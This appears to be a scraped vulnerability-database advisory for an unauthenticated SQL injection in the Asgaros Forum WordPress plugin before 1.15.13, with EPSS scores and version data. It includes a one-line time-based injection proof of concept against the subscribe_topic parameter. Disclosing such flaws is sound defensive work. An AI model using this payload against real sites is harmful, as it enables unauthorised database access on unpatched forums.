Lucene search

K
wpvulndbJrXnmWPVDB-ID:36CC5151-1D5E-4874-BCEC-3B6326235DB1
HistoryOct 11, 2021 - 12:00 a.m.

Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection

2021-10-1100:00:00
JrXnm
wpscan.com
20

0.213 Low

EPSS

Percentile

96.5%

The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue

PoC

https://example.com/forum/?subscribe_topic=1 union select 1 and sleep(10)

CPENameOperatorVersion
asgaros-forumlt1.15.13

0.213 Low

EPSS

Percentile

96.5%